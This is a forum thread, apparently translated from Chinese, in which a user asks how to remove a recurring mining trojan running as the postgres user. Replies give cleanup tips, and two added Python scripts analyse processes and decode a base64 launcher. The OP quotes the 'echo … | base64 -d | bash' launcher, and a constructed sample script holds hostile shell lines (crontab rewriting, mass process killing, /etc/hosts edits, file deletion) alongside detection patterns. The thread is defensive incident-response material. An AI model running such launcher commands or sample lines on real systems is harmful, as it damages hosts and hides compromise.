Asking for help: Ubuntu 16.04 has a trojan on it and I can't get rid of it

15399905591 · 2020-06-11 11:49:14 +08:00 · 1481 views

With top I see a process like this; after I kill it, it comes back after a while:

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    6625 postgres 20 0 2435624 2.035g 4 R 100.0 52.7 1008:52 yYGsf4

Alibaba Cloud's alert reported a script like this, but I can't find any cron job. I suspect postgresql is the cause, but I don't know where to start looking:

    :sh -c echo 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 |base64 -d|bash

15 replies · last reply 2020-06-19 18:08:55 +08:00
1 · id7368 · 2020-06-11 12:01:40 +08:00 via iPhone
You also have to kill the file. Use ps to find the exact file location; it's most likely in the tmp folder. Look there for folders with garbled names.

2 · 15399905591 (OP) · 2020-06-11 12:22:12 +08:00
@id7368 It looks like it was downloaded; I can't find where it gets started from.

3 · superrichman · 2020-06-11 12:26:51 +08:00 via iPhone
crontab -l

4 · ghostwwg · 2020-06-11 13:05:46 +08:00 ❤️ 1
Give up, reinstalling is the way to go.

5 · vinsec · 2020-06-11 13:18:09 +08:00 via Android
Use lsof -p pid to check the related files, then lsof file to look further at the associated processes.

6 · 7654 · 2020-06-11 13:20:17 +08:00
Its whole procedure is in that base64; follow the trail.

7 · wooyuntest · 2020-06-11 13:29:49 +08:00
It probably got in through some vulnerable service and then planted a mining trojan; there should be other scripts as well. Check the tmp directory, crontab, ssh public keys and the firewall. If you can't sort it out I can log in and take a look.
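Added example, not from any reply in this thread: replies 1, 2, 5 and 7 boil down to "find out where the process actually runs from and who started it". Instead of lsof, this script reads the same facts straight from /proc (exe, cwd, argv, parent PID, open fds) and raises flags that matter for the OP's symptoms: a binary that was unlinked after launch, a process running out of a temp directory, and the parent PID that keeps respawning it. The /proc tree it inspects by default is real; the fixture built by build_sample_proc is constructed (PID and command name taken from the top output in the question, the /tmp/.x path and the socket inode are made up) so the script can be run offline.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional

# Directories a legitimate service binary normally does not run from.
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def _readlink(path: Path) -> Optional[str]:
    """Return a symlink target, or None if it cannot be read (e.g. not root)."""
    try:
        return os.readlink(path)
    except OSError:
        return None


def _read_cmdline(proc_dir: Path) -> list:
    """Split the NUL-separated /proc/<pid>/cmdline into argv."""
    try:
        raw = (proc_dir / "cmdline").read_bytes()
    except OSError:
        return []
    return [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]


def _read_ppid(proc_dir: Path) -> Optional[int]:
    """Parent PID is the 4th field of /proc/<pid>/stat; split after the
    parenthesised comm field because comm itself may contain spaces."""
    try:
        stat = (proc_dir / "stat").read_text()
    except OSError:
        return None
    after_comm = stat.rsplit(")", 1)[1].split()
    return int(after_comm[1]) if len(after_comm) > 1 else None


def inspect_pid(pid: int, proc_root: str = "/proc") -> dict:
    """Collect provenance for one process and flag suspicious traits."""
    proc_dir = Path(proc_root) / str(pid)
    if not proc_dir.is_dir():
        raise FileNotFoundError(f"pid {pid} not found under {proc_root}")
    exe = _readlink(proc_dir / "exe")
    cwd = _readlink(proc_dir / "cwd")
    argv = _read_cmdline(proc_dir)
    fds = {}
    fd_dir = proc_dir / "fd"
    if fd_dir.is_dir():
        for name in os.listdir(fd_dir):
            target = _readlink(fd_dir / name)
            if target is not None:
                fds[name] = target
    flags = []
    if exe is None:
        flags.append("exe_unreadable")
    else:
        # The kernel appends " (deleted)" when the binary was unlinked after exec:
        # classic for droppers that delete themselves, and why "ps" shows no file.
        if exe.endswith(" (deleted)"):
            flags.append("binary_deleted_on_disk")
        if exe.startswith(TMP_DIRS) or (cwd or "").startswith(TMP_DIRS):
            flags.append("runs_from_tmp")
    if argv and exe and os.path.basename(exe.replace(" (deleted)", "")) != os.path.basename(argv[0]):
        flags.append("argv0_mismatch")  # process renamed itself to blend in
    return {
        "pid": pid, "ppid": _read_ppid(proc_dir), "exe": exe, "cwd": cwd, "argv": argv,
        "open_sockets": sorted(t for t in fds.values() if t.startswith("socket:")),
        "open_files": sorted(t for t in fds.values() if t.startswith("/")),
        "flags": flags,
    }


def build_sample_proc(root: str) -> int:
    """Constructed fixture imitating /proc for the process in the question's top output
    (PID 6625, command yYGsf4). Paths, parent PID and inode are invented."""
    pid = 6625
    d = Path(root) / str(pid)
    (d / "fd").mkdir(parents=True)
    (d / "cmdline").write_bytes(b"yYGsf4\0")
    (d / "stat").write_text("6625 (yYGsf4) R 4321 6625 6625 0 -1 4194560 0 0 0 0 0 0 0 0 20 0 1 0 0\n")
    os.symlink("/tmp/.x/yYGsf4 (deleted)", d / "exe")
    os.symlink("/tmp/.x", d / "cwd")
    os.symlink("/dev/null", d / "fd" / "0")
    os.symlink("socket:[4242]", d / "fd" / "3")
    os.symlink("/tmp/.x/config.json", d / "fd" / "4")
    return pid


def demo() -> dict:
    """Run inspect_pid against the constructed fixture (offline demo)."""
    with tempfile.TemporaryDirectory() as root:
        return inspect_pid(build_sample_proc(root), proc_root=root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a live box run it as root against the real PID (inspect_pid(6625)); the "ppid" entry is the process to look at next, since the OP's symptom (the miner reappearing after a kill) means something else is respawning it, and cwd plus the "(deleted)" exe path tell you which temp directory to preserve before cleaning up.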
8 · 4linuxfun · 2020-06-11 13:32:43 +08:00
First find out how it got in, then reinstall.

9 · limboMu · 2020-06-11 13:58:22 +08:00
A while ago I was playing with redis exposed to the public internet and got a mining trojan planted too.

10 · limboMu · 2020-06-11 13:58:57 +08:00
@limboMu But I had started it with docker, so just killing the container was enough. Why not use containers?

11 · Kelan · 2020-06-11 14:00:35 +08:00
USER already makes it very clear what happened.

Also, what does this have to do with Python?

12 · asilin · 2020-06-11 14:04:42 +08:00
Simple: since the intrusion came in as the postgres user, back up the postgres service, stop the crontab service, use find to delete all files owned by the postgres user, kill all of the postgres user's processes, then delete the postgres user.

As long as the postgres user can't escalate to root, it can't do much harm; getting rid of the user settles it.

13 · migu123456 · 2020-06-11 14:31:23 +08:00
Shut down the Alibaba Cloud service and kill it. Very likely you enabled that Alibaba Cloud ssh certificate access; you can delete it in the console.

14 · lyi4ng · 2020-06-11 20:33:49 +08:00 ❤️ 1
Decode the base64 yourself and take a look. Roughly: it touches crontab, kills a big batch of processes by process name, kills another batch by network connection destination, then modifies your /etc/hosts, and finally deletes clear.sh, which from the name looks like a cleanup script; no idea where it came from.

With ryuk and tor2web in there, and given how yours looks, it should be a mining trojan.

As for it reappearing after being killed: the big chunk you posted is a daemon; kill that first, OK? Take a look at this: https://www.cnblogs.com/royfans/p/12722792.html

As for the rest, init.d, systemd.d, LKM, ptrace and the like, they probably haven't put that much effort into you; it's just a commonplace open-source mining script.
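Added example, not from any reply in this thread: replies 6 and 14 both say to decode the base64 from the launcher and read what it does. This script does that without ever executing the payload: it pulls the base64 out of an "echo ... | base64 -d | bash" command line, decodes it, and reports which of the behaviours reply 14 describes (crontab changes, killing by process name, killing by network connection, /etc/hosts edits, downloads, self-cleanup) appear in the script, with the matching lines. The actual payload from the alert is redacted on this page, so SAMPLE_SCRIPT is a constructed stand-in modelled on reply 14's description; the indicator names and regexes are my own.

```python
import base64
import binascii
import re
from typing import Optional

# Launcher shape seen in the alert: "sh -c echo <base64> | base64 -d | bash".
LAUNCHER_RE = re.compile(
    r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh"
)

# Behaviours to look for in the decoded script (names are mine, based on reply 14).
INDICATORS = {
    "modifies_crontab": re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron"),
    "kills_by_name": re.compile(r"\b(?:pkill|killall)\b|\bkill\s+-9"),
    "kills_by_connection": re.compile(r"\b(?:netstat|ss)\b.*\|.*\bkill\b"),
    "modifies_hosts": re.compile(r"/etc/hosts\b"),
    "downloads_payload": re.compile(r"\b(?:curl|wget)\b"),
    "self_cleanup": re.compile(r"\brm\s+-r?f\b"),
}


def extract_payload(cmdline: str) -> Optional[str]:
    """Return the base64 blob from a launcher command line, or None if it is not one."""
    m = LAUNCHER_RE.search(cmdline)
    return m.group(1) if m else None


def decode_payload(b64: str) -> str:
    """Strictly decode the blob to text; never passes the result to a shell."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except binascii.Error as e:
        raise ValueError(f"not valid base64: {e}") from e
    return raw.decode("utf-8", errors="replace")


def summarize(script: str) -> dict:
    """Map each matched indicator to the script lines that triggered it."""
    lines = script.splitlines()
    found = {}
    for name, pattern in INDICATORS.items():
        hits = [ln.strip() for ln in lines if pattern.search(ln)]
        if hits:
            found[name] = hits
    return found


def analyze(cmdline: str) -> dict:
    """Full pipeline: detect launcher, decode, summarize. Read-only analysis."""
    b64 = extract_payload(cmdline)
    if b64 is None:
        return {"launcher": False}
    script = decode_payload(b64)
    return {"launcher": True, "script": script, "indicators": summarize(script)}


# Constructed stand-in for the redacted payload; placeholder names only.
SAMPLE_SCRIPT = """#!/bin/bash
crontab -l 2>/dev/null | grep -v example.invalid | crontab -
pkill -f placeholder_miner_name
netstat -antp | grep ':3333' | awk '{print $7}' | cut -d/ -f1 | xargs -r kill -9
echo '0.0.0.0 example.invalid' >> /etc/hosts
rm -f /tmp/clear.sh
"""
SAMPLE_CMDLINE = (
    "sh -c echo " + base64.b64encode(SAMPLE_SCRIPT.encode()).decode() + " |base64 -d|bash"
)

if __name__ == "__main__":
    report = analyze(SAMPLE_CMDLINE)
    print(report["script"])
    for name, hits in report["indicators"].items():
        print(f"{name}:")
        for hit in hits:
            print(f"    {hit}")
```

Feed it the real command line from the alert (or from ps -o args= -p PID) and read the indicator list before deciding on cleanup; the crontab and /etc/hosts hits tell you exactly which persistence and network changes to reverse, and the kill lines usually name the other artefacts the script expects to find on the box.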
15 · 15399905591 (OP) · 2020-06-19 18:08:55 +08:00
@lyi4ng Thanks, it's exactly the same as the article you posted.